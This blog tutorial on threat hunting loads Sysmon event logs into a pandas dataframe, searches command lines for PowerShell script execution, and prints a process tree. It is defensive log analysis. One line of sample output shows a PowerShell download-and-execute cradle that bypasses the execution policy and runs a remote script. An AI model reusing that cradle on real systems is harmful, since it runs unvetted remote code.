Threat Hunting with sysmon 101 part 4: Loading events in pandas dataframe


Loading sysmon events in pandas dataframe

In the previous article, we used PowerShell scripting to filter events and run basic queries. In this article, we will load the Sysmon logs into Python and explore some more powerful queries that help us understand the data better.

Exporting events to xml

The first step is to export the Sysmon events from the event log in XML format. This can be done with either Get-WinEvent or wevtutil, but wevtutil appears to be much faster.

The following command uses wevtutil.exe to dump the log, in XML format, to the file exported-eventlog.xml on the desktop.

WEVTUtil query-events "Microsoft-Windows-Sysmon/Operational" /format:xml /e:events > ~/Desktop/exported-eventlog.xml

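Or use this slower version, based on the Get-WinEvent PowerShell cmdlet. Note that Export-Clixml writes PowerShell's own serialization format (CLIXML), whose layout differs from the wevtutil output, so the parsing code in the next section assumes the wevtutil export.

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'} | Export-Clixml -Path ~/Desktop/exported-eventlog.xml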

Make sure to run these commands as an administrator; otherwise the logs may not export properly.

Loading Events in python

Parsing XML files in Python is easy; we just need to know which nodes and attributes are useful to us. This code snippet loads the XML file, iterates over the events, extracts some data from each one, and then stores everything in a pandas dataframe.

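import tabulate
from bs4 import BeautifulSoup
import pandas as pd

# Windows PowerShell's ">" redirect writes UTF-16, hence encoding='utf16'
with open(r'exported-eventlog.xml', 'r', encoding='utf16') as f:
    data = f.read()

# The "xml" parser of BeautifulSoup requires the lxml package
parsed = BeautifulSoup(data, "xml")

events_list = []
for event in parsed.find_all('Event'):
    evt_dict = {}
    # Fields taken from the <System> section of the event
    evt_dict['EventID'] = event.find('EventID').text
    evt_dict['Computer'] = event.find('Computer').text
    evt_dict['EventRecordID'] = event.find('EventRecordID').text
    # Every <Data Name="..."> element becomes one column
    for j in event.find_all("Data"):
        evt_dict[j['Name']] = j.text
    events_list.append(evt_dict)

# Event types carry different fields; fields an event lacks become NaN
df = pd.DataFrame(events_list)
print('Loaded %d events' % len(df))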
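
If installing BeautifulSoup and lxml is not an option, roughly the same extraction can be sketched with the standard library's xml.etree.ElementTree. This is only a sketch: the sample XML, the computer name, and the function name parse_events are made up for illustration, and the code assumes the events use the usual Windows event namespace.

```python
import xml.etree.ElementTree as ET

# Namespace used by Windows event XML
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Made-up sample that imitates the shape of one exported event
SAMPLE_XML = """<events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <EventID>1</EventID>
    <EventRecordID>115</EventRecordID>
    <Computer>DESKTOP-EXAMPLE</Computer>
  </System>
  <EventData>
    <Data Name="ProcessId">3900</Data>
    <Data Name="Image">C:\\Windows\\System32\\cmd.exe</Data>
  </EventData>
</Event>
</events>"""


def parse_events(xml_text):
    """Return one flat dict per <Event>, mirroring the loop above."""
    rows = []
    root = ET.fromstring(xml_text)
    for event in root.iter("{%s}Event" % NS["e"]):
        row = {}
        for tag in ("EventID", "Computer", "EventRecordID"):
            # findtext returns None when the element is missing
            row[tag] = event.findtext("e:System/e:" + tag, namespaces=NS)
        for data in event.iterfind("e:EventData/e:Data", NS):
            name = data.get("Name")
            if name:  # skip unnamed <Data> elements
                row[name] = data.text
        rows.append(row)
    return rows


rows = parse_events(SAMPLE_XML)
print(rows[0])
```

The resulting list of dictionaries can be passed to pd.DataFrame in the same way as events_list.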

Use case: Search for execution of .ps1 files

We can use Python to run case-insensitive searches over the data. In this example, we use a regex to search the “CommandLine” field for PowerShell executing .ps1 script files.

# case=False ignores case; na=False skips events that have no CommandLine field
is_ps1 = df['CommandLine'].str.contains(r'powershell.*\.ps1', case=False, na=False)
filtered_df = df[is_ps1][['EventID', 'ProcessId', 'CommandLine']]
print(tabulate.tabulate(filtered_df, headers=filtered_df.columns))

The result shows the execution of the exercise file we used in the previous post.

        EventID    ProcessId  CommandLine
----  ---------  -----------  ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 115          1         3900  powershell.exe  -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/11x256/11x256.github.io/test/assets/exercise/th3/1.ps1'))

9082          1         7464  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noexit -command "try { . \"c:\Users\abdo-pc\AppData\Local\Programs\Microsoft VS Code\resources\app\out\vs\workbench\contrib\terminal\browser\media\shellIntegration.ps1\" } catch {}"
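
To see how this kind of filter treats letter case and missing values, here is a small sketch on a hand-made dataframe. The rows are hypothetical, and the pattern with str.contains is one possible way to write the search, not necessarily the only one.

```python
import pandas as pd

# Hypothetical sample rows; real data would come from the dataframe built earlier
sample = pd.DataFrame({
    "EventID": ["1", "1", "3", "1"],
    "CommandLine": [
        "PowerShell.exe -ep bypass -File C:\\temp\\Run.PS1",
        "notepad.exe notes.txt",
        None,  # e.g. network connection events carry no CommandLine
        "powershell.exe -command Get-Date",
    ],
})

# case=False ignores case; na=False treats missing values as non-matches
mask = sample["CommandLine"].str.contains(r"powershell.*\.ps1", case=False, na=False)
hits = sample[mask]
print(hits)
```

Only the first row is kept: the second is not PowerShell, the third has no command line, and the fourth runs PowerShell without a .ps1 file.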

Use case: Create Process Tree

Another thing we can do now is build a process tree that shows the relationships between processes. To build it, we need two things:

1. Identify the root nodes. These nodes (processes) have no parent in our data, either because the parent's event is missing or because the process is the first one created by the OS.
2. Create a list of children for each node. This gives us the parent-child relationships.

The first step: Prepare the data

In this step, we record which nodes are present in our data, so that missing parents can be detected later, and we select the subset of fields to use in the process tree.

# List to store all the nodes
nodes = []
# Dictionary to identify missing nodes
nodes_guids = {}
for i in df[df['EventID'] == "1" ].itertuples():
    node = {}
    node['Name'] = i.Image.split('\\')[-1]
    node['Cmd'] = i.CommandLine
    node['ProcessGuid'] = i.ProcessGuid
    node['ParentProcessGuid'] = i.ParentProcessGuid
    node['ProcessId'] = i.ProcessId

    nodes.append(node)
    nodes_guids[i.ProcessGuid] = 1 # set the node in the dict as available
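
The check for missing parents can also be sketched directly in pandas with isin. The dataframe below is hypothetical, and its GUID values are shortened placeholders rather than real Sysmon GUIDs.

```python
import pandas as pd

# Hypothetical process-creation rows; GUIDs are shortened placeholders
procs = pd.DataFrame({
    "Image": [
        "C:\\app\\chrome.exe",
        "C:\\Windows\\System32\\cmd.exe",
        "C:\\Windows\\System32\\conhost.exe",
    ],
    "ProcessGuid": ["{A}", "{B}", "{C}"],
    "ParentProcessGuid": ["{X}", "{A}", "{B}"],
})

# True where the parent's creation event is absent from the data set
parent_missing = ~procs["ParentProcessGuid"].isin(procs["ProcessGuid"])
print(procs.loc[parent_missing, ["Image", "ParentProcessGuid"]])
```

Rows flagged this way correspond to the root nodes of the tree.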

The second step: Create the parent-child relationship

roots = []
children = {}

for i in nodes:
    if nodes_guids.get(i['ParentProcessGuid'] , 0 ) == 0:
        roots.append(i)
    else:
        if i['ParentProcessGuid']  not in children:
            children[i['ParentProcessGuid'] ] = []
        children[i['ParentProcessGuid'] ].append(i)

This code creates a list of roots, which are the nodes whose parent is not in our data set, and a list of children for each parent.
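
The same grouping can be written a little more compactly with a set and collections.defaultdict. This is a sketch on made-up nodes; the function name link_nodes and the placeholder GUIDs are assumptions for illustration.

```python
from collections import defaultdict

# Hypothetical nodes in the same shape as the dictionaries built in the first step
sample_nodes = [
    {"Name": "chrome.exe", "ProcessGuid": "{A}", "ParentProcessGuid": "{X}"},
    {"Name": "cmd.exe", "ProcessGuid": "{B}", "ParentProcessGuid": "{A}"},
    {"Name": "conhost.exe", "ProcessGuid": "{C}", "ParentProcessGuid": "{B}"},
]


def link_nodes(nodes):
    """Split nodes into roots and a parent-GUID -> children mapping."""
    known = {n["ProcessGuid"] for n in nodes}
    roots, children = [], defaultdict(list)
    for n in nodes:
        if n["ParentProcessGuid"] in known:
            children[n["ParentProcessGuid"]].append(n)
        else:
            # Parent event is not in the data, so treat the node as a root
            roots.append(n)
    return roots, children


sample_roots, sample_children = link_nodes(sample_nodes)
print([n["Name"] for n in sample_roots])
```

Using defaultdict removes the need to check whether a parent already has a list before appending to it.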

The third step: Print the tree

Now that everything is ready, we just need to print the data using recursion. Recursion lets us print the data in the required order: the root, then its first child, then the first child of that child, and so on.

root
    child 1
        child 1 1
            child 1 1 1
        child 1 2
        child 1 3
            child 1 3 1
            child 1 3 2
    child 2
    child 3 
    ... 

If we printed the nodes with a plain for loop instead, the output would come out in an order that makes little sense for a process tree, like this:

root
    child 1
    child 2
    child 3
    child 4
    child 1 1
    child 1 2
    child 3 1
    .... and so on
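
To make the difference between the two orders concrete, here is a sketch on a made-up tree. The dictionary tree and both function names are hypothetical; level_order imitates the loop-based output above, while depth_first produces the order we want for a process tree.

```python
from collections import deque

# Hypothetical tree: each key maps a node to its children
tree = {
    "root": ["child 1", "child 2"],
    "child 1": ["child 1 1", "child 1 2"],
    "child 2": ["child 2 1"],
}


def level_order(start):
    """Visit level by level, as a simple queue-based loop would."""
    order, queue = [], deque([start])
    while queue:
        node = queue.popleft()
        order.append(node)
        queue.extend(tree.get(node, []))
    return order


def depth_first(node):
    """Visit a node, then the whole subtree of each child in turn."""
    order = [node]
    for child in tree.get(node, []):
        order.extend(depth_first(child))
    return order


print(level_order("root"))
print(depth_first("root"))
```

In the depth-first result, every child appears directly under its own parent, which is what makes the indented output readable.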

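The recursive function below prints each node followed immediately by its own subtree, which gives the desired order:

def print_node(node, indent=0):
    # Print the current process, indented according to its depth
    print(' '*indent , node['Name'] , node['ProcessId'])
    # Then print every child one level deeper
    for j in children.get(node['ProcessGuid'], []):
        print_node(j, indent=indent+4)

# Start one tree from each root
for i in roots:
    print_node(i)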

This prints something like the following, depending on which fields you choose to print:

 mscorsvw.exe 1532
 mscorsvw.exe 5964
 chrome.exe 9320
     chrome.exe 6456
     chrome.exe 7568
     chrome.exe 940
     chrome.exe 10788
     chrome.exe 7448
     chrome.exe 3400
     chrome.exe 7060
     chrome.exe 5292
     chrome.exe 11128
     chrome.exe 4340
     chrome.exe 8556
     chrome.exe 8816
     chrome.exe 2052
     chrome.exe 5896
     chrome.exe 7016
     cmd.exe 5292
         conhost.exe 8224
     chrome.exe 768
     chrome.exe 9288
     chrome.exe 9716
     cmd.exe 4264
         conhost.exe 6736
    ....
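
Once the tree exists, the same structures can be walked to summarize the parent-child relationships, for example to notice a pair such as chrome.exe starting cmd.exe. The sketch below uses made-up miniature versions of roots and children; the function name count_pairs and the placeholder GUIDs are assumptions.

```python
from collections import Counter

# Hypothetical miniature versions of the roots and children structures
demo_roots = [{"Name": "chrome.exe", "ProcessGuid": "{A}"}]
demo_children = {
    "{A}": [
        {"Name": "chrome.exe", "ProcessGuid": "{B}"},
        {"Name": "chrome.exe", "ProcessGuid": "{C}"},
        {"Name": "cmd.exe", "ProcessGuid": "{D}"},
    ],
    "{D}": [{"Name": "conhost.exe", "ProcessGuid": "{E}"}],
}


def count_pairs(roots, children):
    """Count (parent name, child name) pairs over the whole forest."""
    pairs = Counter()
    stack = list(roots)  # explicit stack instead of recursion
    while stack:
        parent = stack.pop()
        for child in children.get(parent["ProcessGuid"], []):
            pairs[(parent["Name"], child["Name"])] += 1
            stack.append(child)
    return pairs


pair_counts = count_pairs(demo_roots, demo_children)
# List the rarest pairs first
for (parent, child), n in sorted(pair_counts.items(), key=lambda kv: kv[1]):
    print(parent, "->", child, n)
```

Sorting by count puts the rarest pairs first, which can be a reasonable place to start looking.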


abdo
